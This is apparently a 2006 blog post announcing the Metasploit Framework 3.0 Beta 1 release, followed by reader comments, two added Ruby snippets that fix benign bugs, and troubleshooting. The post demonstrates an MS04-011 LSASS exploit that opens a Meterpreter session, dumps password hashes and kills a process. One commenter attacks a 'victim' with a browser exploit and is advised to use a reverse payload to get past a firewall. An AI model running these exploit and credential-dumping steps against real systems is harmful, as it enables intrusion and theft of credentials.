Metasploit Framework 3.0 Beta 1
We are happy to announce that the first beta release of the 3.0 tree is now ready for download. This release contains numerous bug fixes and improvements to the previous alpha release. 3.0 Beta 1 is fully compatible with Linux, BSD, Mac OS X, and Windows using our custom Cygwin installer. If you would like to discuss the beta release with other users, please subscribe to the framework-beta mailing list by sending a blank email to framework-beta-subscribe[at]metasploit.com.
If you are attending the Black Hat security conference in Las Vegas, I will be presenting on the new functionality available in this release at 4:45pm on August 2nd. This talk is part of the /dev/random track and is entitled Metasploit Reloaded.
Some quick highlights compared to version 2.6:
- All modules are organized in a directory hierarchy
- Common Meterpreter modules have been merged into 'stdapi'
- New Meterpreter features significantly help with penetration testing
- New type of "passive" exploits (browser, sniffer, ids attacks)
- Denial of service modules (ms05-035 and unpatched RRAS)
- Support for multiple shells per exploit with passive modules
- Support for recent browser bugs :-)
This release can be obtained from the Metasploit web site.
Unix users may need to install the openssl and zlib ruby modules for the Framework to load. If you are using Ubuntu, run the following commands:
# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby
Users of other distributions or Unix flavors may want to grab the latest version of ruby from www.ruby-lang.org and build it from source.
Mac OS X users should install GNU Readline prior to rebuilding Ruby. Although it is possible to use the Framework without readline, the tab completion features in msfconsole work great and can save quite a bit of time.
Windows users will need to exit out of any running Cygwin-based applications before running the installer or using the Framework. We really tried to work with the native ruby interpreter for Windows, but numerous io/readline/stdin issues came up and we will try again once the code base gets a little more stable.
A quick demonstration of using msfconsole with meterpreter:
                ____________
               < metasploit >
                ------------
                       \   ,__,
                        \  (oo)____
                           (__)    )\
                              ||--|| *

       =[ msf v3.0-beta-1
+ -- --=[ 86 exploits - 90 payloads
+ -- --=[ 16 encoders - 4 nops
       =[ 4 aux
msf > use exploit/windows/smb/ms04_011_lsass
msf exploit(ms04_011_lsass) > set RHOST 192.168.0.106
RHOST => 192.168.0.106
msf exploit(ms04_011_lsass) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler..
[*] Getting OS information...
[*] Trying to exploit Windows 2000 LAN Manager
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.145:41829 -> 192.168.0.106:4444)
[*] The DCERPC service did not reply to our request
Loading extension stdapi...success.
meterpreter > getuid
Server username: SYSTEM
meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[snip]:::
meterpreter > cd c:\
meterpreter > ls
Listing: c:
============
Mode              Size    Type  Last modified                 Name
----              ----    ----  -------------                 ----
100444/r--r--r--  0       fil   Sat Oct 09 11:03:03 CDT 2004  IO.SYS
100444/r--r--r--  0       fil   Sat Oct 09 11:03:03 CDT 2004  MSDOS.SYS
40777/rwxrwxrwx   0       dir   Sat Oct 09 11:21:49 CDT 2004  RECYCLER
40777/rwxrwxrwx   0       dir   Sat May 21 18:12:30 CDT 2005  WINNT
100666/rw-rw-rw-  195     fil   Sat Oct 09 05:38:57 CDT 2004  boot.ini
100444/r--r--r--  214416  fil   Mon Dec 06 14:00:00 CST 1999  ntldr
[ snip ]
meterpreter > ps
Process list
============
PID   Name          Path
---   ----          ----
176   smss.exe      \SystemRoot\System32\smss.exe
200   csrss.exe     \??\C:\WINNT\system32\csrss.exe
224   winlogon.exe  \??\C:\WINNT\system32\winlogon.exe
252   services.exe  C:\WINNT\system32\services.exe
264   lsass.exe     C:\WINNT\system32\lsass.exe
440   svchost.exe   C:\WINNT\system32\svchost.exe
[ snip ]
1804  wins.exe      C:\WINNT\System32\wins.exe
2676  logon.scr     C:\WINNT\system32\logon.scr
meterpreter > kill 2676
Killing: 2676
16 Comments:
Excellent!! Best exploit framework EVER!
Cool. I wish I could be at BH. Maybe you could release the conference proceedings at metasploit.com after the talk?
Great work as always. Thanks again. Amir, BH typically releases the proceedings of the conferences on its website, just look around :)
I was at the Black Hat brief today and it was excellent! Can't wait to play with this!
Administrators nightmare of the year? ;p
http://blogs.technet.com/photos/bluehat/images/422890/425x283.aspx
Umm, I've got a problem with the Windows version: whenever I try to do something that involves establishing a network connection it writes an error message about uninitialized constant AF_INET6. Do I have to install something on my SP1? IPv6? Or is it a bug? Please, anyone who knows a solution, mail me at artyome1@front.ru
As above.. what causes this?
(2.6 works.. just not 3 beta..)
Connect to msfweb at http://127.0.0.1:55555/
/usr/lib/ruby/gems/1.8/gems/activesupport-1.3.1/lib/active_support/dependencies.rb:123:in `const_missing': uninitialized constant AF_INET6 (NameError)
from /usr/lib/ruby/gems/1.8/gems/activesupport-1.3.1/lib/active_support/dependencies.rb:131:in `const_missing'
from /usr/lib/ruby/gems/1.8/gems/activesupport-1.3.1/lib/active_support/dependencies.rb:133:in `const_missing'
from /home/framework/lib/rex/socket.rb:127:in `to_sockaddr'
from /home/framework/lib/rex/socket/comm/local.rb:51:in `create_by_type'
from /home/framework/lib/rex/socket/comm/local.rb:24:in `create'
from /home/framework/lib/rex/socket.rb:44:in `create_param'
from /home/framework/lib/rex/socket/tcp_server.rb:38:in `create_param'
from /home/framework/lib/rex/socket/tcp_server.rb:27:in `create'
from /home/framework/lib/rex/proto/http/server.rb:123:in `start'
from /home/framework/lib/rex/service_manager.rb:80:in `start'
from /home/framework/lib/rex/service_manager.rb:24:in `start'
from /home/framework/lib/msf/ui/web/driver.rb:116:in `run'
from /home/framework/msfweb:56
Not sure what the cause is, I can't reproduce on my systems here. It must be Ruby's socket class not defining a constant when certain conditions are met. The fix is already in the source tree and will be included in the next release.
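The failure in the trace above is a bare reference to a constant (`AF_INET6`) that some Ruby builds simply do not define, so the lookup lands in `const_missing` and raises `NameError` before any socket is created. The following Ruby snippet is an added example, not code from the Metasploit tree: `AddrHelper`, `NoV6Socket` and the `sock` parameter are constructed for illustration. It places the unguarded lookup beside a guarded version that probes for IPv6 support with `const_defined?` first and turns the unsupported case into a descriptive error.

```ruby
require 'socket'

# Added example, not code from the Metasploit tree: shows the failure the
# trace above reports (a bare reference to AF_INET6 on a Ruby whose Socket
# class lacks it) next to a guarded version that detects IPv6 support first.
module AddrHelper
  # True only if the given Socket-like module exposes the IPv6 family constant.
  # The `sock` parameter exists so the behaviour can be exercised against a
  # constructed stand-in for a Ruby built without IPv6 (hypothetical helper).
  def self.support_ipv6?(sock = ::Socket)
    sock.const_defined?(:AF_INET6)
  end

  # Wildcard listen address that is valid for the running interpreter.
  def self.wildcard(sock = ::Socket)
    support_ipv6?(sock) ? '::' : '0.0.0.0'
  end

  # Buggy pattern: an unguarded constant lookup raises NameError
  # ("uninitialized constant ...::AF_INET6") when IPv6 is missing.
  def self.unguarded_family(ip, sock = ::Socket)
    ip.include?(':') ? sock::AF_INET6 : sock::AF_INET
  end

  # Guarded version: never touches AF_INET6 unless it exists, and turns the
  # unsupported case into a descriptive ArgumentError instead of a NameError.
  def self.to_sockaddr(ip, port, sock = ::Socket)
    if ip.include?(':') && !support_ipv6?(sock)
      raise ArgumentError, "IPv6 address #{ip} requested but this Ruby lacks AF_INET6"
    end
    ::Socket.pack_sockaddr_in(port, ip)
  end
end

# Constructed stand-in for a Socket class compiled without IPv6 support.
module NoV6Socket
  AF_INET = ::Socket::AF_INET
end

if __FILE__ == $PROGRAM_NAME
  puts "real Ruby supports IPv6: #{AddrHelper.support_ipv6?}"
  puts "wildcard without IPv6:   #{AddrHelper.wildcard(NoV6Socket)}"
  begin
    AddrHelper.unguarded_family('::1', NoV6Socket)
  rescue NameError => e
    puts "unguarded lookup: #{e.class}: #{e.message}"
  end
  begin
    AddrHelper.to_sockaddr('::1', 4444, NoV6Socket)
  rescue ArgumentError => e
    puts "guarded lookup:   #{e.class}: #{e.message}"
  end
end
```

Run it with `ruby addr_helper.rb`; the unguarded call reproduces the `uninitialized constant NoV6Socket::AF_INET6` message, while the guarded path either builds a normal IPv4 sockaddr or fails with a message that names the actual problem.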
Awesome tool. You guys rock. I'd love to see an auxiliary module added that will let me launch a payload against a win32 host with a username and password. In a pen test you 0wn Host 1 and get the creds. Host 2 is fully patched, but has the same creds as host 1. I'd like to supply the creads and use meterpreter on the box rather than other less stealthy tools.
Well.... yeah. I tried the new Metasploit Framework (3.0) and when I enter set payload then the payload name and then I hit exploit, meanwhile it says I didn't set a payload when I did! Can someone explain what is going on.
Here, let me show you what I mean:
msf exploit(ms06_040_netapi) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf exploit(ms06_040_netapi) > exploit
[-] Exploit failed: A payload has not been selected.
The correct option name is PAYLOAD, not payload, but we added a patch to prevent confusion (it will accept either case now, but you only get tab completion when it's properly cased).
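The behaviour described in the reply above (option names accepted in either case, tab completion only on the canonical spelling) is easy to get wrong in a plain hash keyed by whatever the user typed. The following Ruby class is an added example, not Metasploit's own DataStore code; `OptionStore`, `selected?` and the `case_insensitive:` switch are constructed for illustration. The switch keeps the old strict behaviour side by side with the patched one so the "A payload has not been selected" outcome can be reproduced and compared.

```ruby
# Added example, not Metasploit's own DataStore code: option names are kept
# under one canonical spelling and matched case-insensitively on set/get, so
# "set payload ..." and "set PAYLOAD ..." update the same entry, while tab
# completion only matches the canonical (upper-case) names.
class OptionStore
  # case_insensitive: false reproduces the pre-patch behaviour, where a
  # lower-case "payload" lands under a different key than "PAYLOAD".
  def initialize(canonical_names, case_insensitive: true)
    @case_insensitive = case_insensitive
    # upcased lookup key => canonical spelling
    @canonical = canonical_names.each_with_object({}) { |n, h| h[n.upcase] = n }
    @values = {}
  end

  # Map what the user typed onto the canonical name; unknown options are
  # kept exactly as typed.
  def key_for(name)
    return name unless @case_insensitive
    @canonical.fetch(name.upcase, name)
  end

  # Returns the key the value was stored under.
  def set(name, value)
    key = key_for(name)
    @values[key] = value
    key
  end

  def get(name)
    @values[key_for(name)]
  end

  # The check an exploit would run before launching.
  def selected?(name)
    !get(name).nil?
  end

  # Prefix completion is case-sensitive: only a properly cased prefix matches.
  def complete(prefix)
    @canonical.values.select { |n| n.start_with?(prefix) }.sort
  end
end

if __FILE__ == $PROGRAM_NAME
  old = OptionStore.new(%w[PAYLOAD RHOST], case_insensitive: false)
  old.set('payload', 'generic/shell_bind_tcp')
  puts "pre-patch, payload selected?  #{old.selected?('PAYLOAD')}"   # false

  store = OptionStore.new(%w[PAYLOAD RHOST LHOST])
  store.set('payload', 'generic/shell_bind_tcp')
  puts "patched,   payload selected?  #{store.selected?('PAYLOAD')}" # true
  puts "complete 'PAY': #{store.complete('PAY').inspect}"            # ["PAYLOAD"]
  puts "complete 'pay': #{store.complete('pay').inspect}"            # []
end
```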
hdm i want to ask you something.
[*]Starting bind handler.
[-]Exploit failed: uninitialized constant AF_INET6.:(( Why? I'm running version 3.0-beta1.
Upgrade to the stable version of 3.0
use windows/browser/ie_createobject
set PAYLOAD windows/meterpreter/bind_tcp
[*] Using URL: http://88.218.94.61:8080/WmoHjEj9Zi
[*] Server started.
[*] Exploit running as background job.
[*] Started bind handler
msf exploit(ie_createobject) >
The victim clicks the URL with IE, but I don't get any session. I get only this:
[*] Started bind handler
msf exploit(ie_createobject) >
use windows/browser/ie_createobject
set PAYLOAD windows/meterpreter/bind_tcp
[*] Using URL: http://myip:8080/WmoHjEj9Zi
[*] Server started.
[*] Exploit running as background job.
[*] Started bind handler
msf exploit(ie_createobject) >
The victim clicks the URL with IE but I get only "Started bind handler" and no sessions.
Make sure the target is actually exploitable and that their firewall has been disabled. If they have an active firewall, switch to a reverse* payload instead of a bind.